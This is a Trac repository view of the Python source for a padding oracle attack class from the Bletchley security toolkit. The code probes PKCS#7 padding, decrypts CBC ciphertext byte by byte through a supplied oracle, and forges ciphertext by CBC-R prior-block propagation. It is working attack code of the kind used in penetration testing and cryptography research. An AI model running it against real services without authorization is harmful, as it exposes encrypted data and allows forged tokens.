source: trunk/lib/bletchley/CBC/__init__.py @ 69

Last change on this file since 69 was 69, checked in by tim, 10 years ago

.

File size: 15.7 KB
Line 
1'''
2Created on Jul 4, 2010
3
4Copyright (C) 2010 ELOI SANFÈLIX
5Copyright (C) 2012-2013 Timothy D. Morgan
6@author: Eloi Sanfelix < eloi AT limited-entropy.com >
7@author: Timothy D. Morgan < tmorgan {a} vsecurity . com >
8
9 This program is free software: you can redistribute it and/or modify
10 it under the terms of the GNU Lesser General Public License, version 3,
11 as published by the Free Software Foundation.
12
13 This program is distributed in the hope that it will be useful,
14 but WITHOUT ANY WARRANTY; without even the implied warranty of
15 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
16 GNU General Public License for more details.
17
18 You should have received a copy of the GNU General Public License
19 along with this program.  If not, see <http://www.gnu.org/licenses/>.
20'''
21
22import random
23import struct
24import threading
25from .. import buffertools
26from .Exceptions import *
27
28class POA:
29    """This class implements padding oracle attacks given a ciphertext and
30    function that acts as a padding oracle.
31
32    The padding scheme is assumed to be PKCS#5/#7, also defined in RFC2040.
33    This attack was first described in:
34     "Security Flaws Induced by CBC Padding. Applications to SSL, IPSEC,
35      WTLS" by Serge Vaudenay (2002)
36
37    POA objects are not caller thread-safe.  If multiple threads need to work
38    simultaneously on the same ciphertext and oracle, create a
39    separate instance. POA objects can execute tasks internally using
40    multiple threads, however.
41
42    """
43
44    ## private
45    _thread_result = None
46    _oracle = None
47    _ciphertext = None
48    _iv = None
49
50    ## protected (reading ok, changing not ok)
51    block_size = None
52
53    ## public (r/w ok)
54    retries = 2
55    decrypted = None
56    threads = None
57    log_fh = None
58   
59    def __init__(self, oracle, block_size, ciphertext, iv=None,
60                 threads=1, decrypted=b'', log_file=None):
61        """Creates a new padding oracle attack (POA) object.
62
63        Arguments:
64        oracle -- A function which returns True if the given ciphertext
65         results in a correct padding upon decryption and False
66         otherwise.  This function should implement the prototype:
67           def myOracle(ciphertext, iv): ...
68         If the initialization vector (iv) is unknown or not included in
69         the ciphertext message, it can be ignored in your oracle
70         implementation (though some limitations will result from this).
71
72        block_size -- The block size of the ciphertext being attacked.
73         Is almost always 8 or 16.
74
75        ciphertext -- The ciphertext to be decrypted
76
77        iv -- The initialization vector associated with the ciphertext.
78         If none provided, it is assumed to be a block of 0's
79
80        threads -- The maximum number of parallel threads to use during
81         decryption.  If more than one thread is used, then the oracle
82         function will be called in parallel.  It should implement any
83         internal locking necessary to prevent race conditions where
84         applicable.
85
86        decrypted -- If a portion of the plaintext is already known (due
87         to a prior, partially successful decryption attempt), then this
88         may be used to restart the decryption process where it was
89         previously left off.  This argument is assumed to contain the
90         final N bytes (for an N-byte argument) of the plaintext; that
91         is, the tail of the plaintext including the pad.
92
93        log_file -- A Python file object where log messages will be
94         written.
95
96        """
97
98        if(len(ciphertext)%block_size != 0 or len(ciphertext) < block_size):
99            raise InvalidBlockError(block_size,len(ciphertext))
100        if(iv != None and len(iv)%block_size != 0):
101            raise InvalidBlockError(block_size,len(iv))
102        if len(decrypted) > len(ciphertext):
103            raise Exception #XXX: custom exception
104       
105        self.block_size = block_size
106        self.decrypted = decrypted
107        self.threads = threads
108        self.log_fh = log_file
109
110        self._oracle = oracle
111        self._ciphertext = ciphertext
112        if iv == None:
113            self._iv = b'\x00'*self.block_size
114        else:
115            self._iv = iv
116
117
118    def log_message(self, s):
119        if self.log_fh != None:
120            self.log_fh.write(s+'\n')
121
122
123    def probe_padding(self):
124        """Attempts to verify that a CBC padding oracle exists and then determines the
125        pad value. 
126
127        Returns the pad string, or None on failure.
128        XXX: Currently only works for PKCS 5/7.
129        """
130
131        blocks = buffertools.splitBuffer(self._ciphertext, self.block_size)
132        final = blocks[-1]
133        if len(blocks) == 1:
134            # If only one block present, then try to use IV as prior
135            prior = self._iv
136        else:
137            prior = blocks[-2]
138
139        ret_val = None
140        # First probe for beginning of pad
141        for i in range(0-self.block_size,0):
142            if i == -1:
143                break
144            tweaked = prior[i] ^ 0xFF
145            tweaked = struct.pack("B", tweaked)
146            if not self._oracle(self._ciphertext+prior[:i]+tweaked+prior[i+1:]+final, self._iv):
147                break
148
149        pad_length = 0-i
150        self.log_message("Testing suspected pad length: %d" % pad_length)
151        if pad_length > 1:
152            # XXX: If this test case fails, we should try instead
153            # lengthing the pad by one byte with all 256 values (as is
154            # done in the 1-byte pad case).
155            #
156            # Verify suspected pad length by changing last pad byte to 1
157            # and making sure the padding succeeds
158            tweaked = prior[-1] ^ (pad_length^1)
159            tweaked = struct.pack("B", tweaked)
160
161            #XXX: This replaces the pad bytes with spaces.  The hope is
162            #     that any UTF-8 decoding errors that the pad bytes
163            #     might generate are addressed this way.  It is not yet
164            #     well tested.  An option should be added to allow other
165            #     bytes to be used or to turn off the behavior.
166            prior = bytearray(prior)
167            for q in range(0-self.block_size,-1):
168                prior[q] = prior[q]^(pad_length^32) # space
169
170            if self._oracle(self._ciphertext+prior[:-1]+tweaked+final, self._iv):
171                ret_val = buffertools.pkcs7Pad(pad_length)
172
173        else:
174            # Verify by changing pad byte to 2 and brute-force changing
175            # second-to-last byte to 2 as well
176            tweaked = prior[-1] ^ (2^1)
177            tweaked = struct.pack("B", tweaked)
178            for j in range(1,256):
179                guess = prior[-2] ^ j
180                guess = struct.pack("B", guess)
181                if self._oracle(self._ciphertext+prior[:-2]+guess+tweaked+final, self._iv):
182                    # XXX: Save the decrypted byte for later
183                    ret_val = buffertools.pkcs7Pad(pad_length)
184
185        return ret_val
186
187
188    # XXX: This could be generalized as a byte probe utility for a variety of attacks
189    def _test_value_set(self, prefix, suffix, value_set):
190        for b in value_set:
191            if self._thread_result != None:
192                # Stop if another thread found the result
193                break
194            if self._oracle(prefix+struct.pack("B",b)+suffix, self._iv):
195                self._thread_result = b
196                break
197
198
199    def decrypt_next_byte(self, prior, block, known_bytes, cache=True):
200        """Decrypts one byte of ciphertext by modifying the prior
201        ciphertext block at the same relative offset.
202
203        Arguments:
204        prior -- Ciphertext block appearing prior to the current target
205        block -- Currently targeted ciphertext block
206        known_bytes -- Bytes in this block already decrypted
207
208        """
209
210        if(len(block)!=self.block_size):
211            raise InvalidBlockError
212        numKnownBytes = len(known_bytes)
213       
214        if(numKnownBytes >= self.block_size):
215            return known_bytes
216       
217        prior_prefix = prior[0:self.block_size-numKnownBytes-1]
218        base = prior[self.block_size-numKnownBytes-1]
219        # Adjust known bytes to appear as a PKCS 7 pad
220        suffix = [0]*numKnownBytes
221        for i in range(0,numKnownBytes):
222            suffix[i] ^= prior[0-numKnownBytes+i]^known_bytes[i]^(numKnownBytes+1)
223        suffix = struct.pack("B"*len(suffix),*suffix)+block
224
225        # XXX: catch any signal exceptions, such as ^C, and communicate
226        #      this back to the rest of the script so it can end immediately
227        for x in range(0, 1+self.retries):
228            # Each thread spawned searches a subset of the next byte's
229            # 256 possible values
230            self._thread_result = None
231            threads = []
232            for i in range(0,self.threads):
233                t = threading.Thread(target=self._test_value_set, 
234                                     args=(self._ciphertext+prior_prefix, suffix, range(i,256,self.threads)))
235                t.start()
236                threads.append(t)
237               
238            for t in threads:
239                t.join()
240               
241            # If a byte fails to decrypt, it could be because the prior
242            # block's decrypted value violates UTF-8 decoding rules, or
243            # because it randomly introduced a delimiter that causes
244            # problems.  If retries are enabled, we insert an additional
245            # random block before the prior block so that the decrypted
246            # value can be changed.
247            if self._thread_result == None:
248                if x < self.retries:
249                    self.log_message("Value of a byte could not be determined. Retrying...")
250                    # XXX: Instead of adding a new random block to the
251                    #      beginning every time, would be better to just keep
252                    #      randomizing the same block before the original
253                    #      prior_prefix.
254                    prior_prefix = bytes([random.getrandbits(8) for i in range(self.block_size)]) + prior_prefix
255            else:
256                break
257
258        if self._thread_result == None:
259            self.log_message("Value of a byte could not be determined.  Current plaintext suffix: "+ repr(self.decrypted))
260            raise Exception #XXX: custom exception
261       
262        decrypted = struct.pack("B",self._thread_result^base^(numKnownBytes+1))
263        if cache:
264            self.decrypted = decrypted + self.decrypted
265        #  Return previous bytes together with current byte
266        return decrypted+known_bytes
267   
268
269    def decrypt_block(self, prior, block, last_bytes=b'', cache=True):
270        """Decrypts the block of ciphertext provided as a parameter.
271
272        """
273
274        while(len(last_bytes)!=self.block_size):
275            last_bytes = self.decrypt_next_byte(prior, block, last_bytes, cache)
276
277        self.log_message("Decrypted block: %s" % repr(last_bytes))
278        return last_bytes
279
280
281    def decrypt(self):
282        """Decrypts the previously supplied ciphertext. If the IV was
283        not provided, it assumes a IV of zero bytes.
284
285        """
286
287        if len(self.decrypted) == 0:
288            # First decrypt the padding (quick to decrypt and good sanity check)
289            pad_bytes = self.probe_padding()
290            if pad_bytes == None:
291                # XXX: custom exception
292                self.log_message("Could not determine pad length")
293                raise Exception
294           
295            self.decrypted = pad_bytes
296
297
298        # Start where we left off last, whether that be with just a pad,
299        # or with additional decrypted blocks.
300
301        # number of bytes in any partially decrypted blocks
302        num_partial = len(self.decrypted) % self.block_size
303
304        # number of blocks fully decrypted
305        finished_blocks = len(self.decrypted) // self.block_size
306
307        # contents of the partial block
308        partial = self.decrypted[0:num_partial]
309
310        # contents of fully decrypted blocks
311        decrypted = self.decrypted[num_partial:]
312       
313        blocks = buffertools.splitBuffer(self._ciphertext, self.block_size)
314
315        # Start with the partially decrypted block at the end, and work
316        # our way to the front.  Don't decrypt the very first block of
317        # the ciphertext yet.
318        for i in range(len(blocks)-1-finished_blocks, 0, -1):
319            decrypted = self.decrypt_block(blocks[i-1], blocks[i], partial) + decrypted
320            partial = b''
321               
322        # Finally decrypt first block
323        if finished_blocks < len(blocks):
324            decrypted = self.decrypt_block(self._iv, blocks[0], partial) + decrypted
325       
326        # Remove the padding and return
327        return buffertools.stripPKCS7Pad(decrypted, self.block_size, self.log_fh)
328
329
330    def encrypt_block(self, plaintext, ciphertext):
331        """Encrypts a block of plaintext.  This is accomplished by
332        decrypting the supplied ciphertext and then computing the prior
333        block needed to create the desired plaintext at the ciphertext's
334        location.
335
336        Returns the calculated prior block and the provided ciphertext
337        block as a tuple.
338
339        """
340        if len(plaintext) != self.block_size or len(plaintext) != len(ciphertext):
341            raise InvalidBlockError(self.block_size,len(plaintext))
342
343        ptext = self.decrypt_block(b'\x00'*self.block_size, ciphertext, cache=False)
344        prior = buffertools.xorBuffers(ptext, plaintext)
345        self.log_message("Encrypted block: %s to %s with prior %s" % (repr(plaintext), repr(ciphertext), repr(prior)))
346        return prior,ciphertext
347   
348   
349    def encrypt(self,plaintext, ciphertext=None):
350        """Encrypts a plaintext value through "CBC-R" style prior-block
351        propagation.
352       
353        Returns a tuple of the IV and ciphertext. 
354
355        NOTE: If your target messages do not include an IV with the
356        ciphertext, you can instead opt to encrypt a suffix of the
357        message and include the IV in the the middle of the ciphertext as
358        if it were an encrypted block. This one block alone will decrypt
359        to an uncontrollable random value, but with careful placement,
360        this might be ok.
361
362        """
363       
364        blocks = buffertools.splitBuffer(buffertools.pkcs7PadBuffer(plaintext, self.block_size), 
365                                         self.block_size)
366        if ciphertext != None:
367            if len(ciphertext) % self.block_size != 0:
368                raise InvalidBlockError(self.block_size,len(ciphertext))
369            num_cblocks = (len(ciphertext) // self.block_size) - 1
370            del blocks[0-num_cblocks:] # we've already encrypted these
371            prior = ciphertext[0:self.block_size]
372           
373        elif (len(self.decrypted) >= self.block_size
374            and len(self._ciphertext) >= 2*self.block_size):
375            # If possible, reuse work from prior decryption efforts on original
376            # message for last block
377            old_prior = self._ciphertext[0-self.block_size*2:0-self.block_size]
378            final_plaintext = self.decrypted[0-self.block_size:]
379            prior = buffertools.xorBuffers(old_prior,
380                                           buffertools.xorBuffers(final_plaintext, blocks[-1]))
381            ciphertext = self._ciphertext[0-self.block_size:]
382            del blocks[-1]
383        else:
384            # Otherwise, select a random last block and generate the prior block
385            prior = struct.pack("B"*self.block_size, 
386                                     *[random.getrandbits(8) for i in range(self.block_size)])
387            ciphertext = b''
388
389        try:
390            # Continue generating all prior blocks
391            for i in range(len(blocks)-1, -1, -1):
392                prior,cblock = self.encrypt_block(blocks[i],prior)
393                ciphertext = cblock+ciphertext
394        except Exception as e:
395            self.log_message("Encryption failure. prior+ciphertext: %s" % repr(prior+ciphertext))
396
397        # prior as IV
398        return prior,ciphertext
Note: See TracBrowser for help on using the repository browser.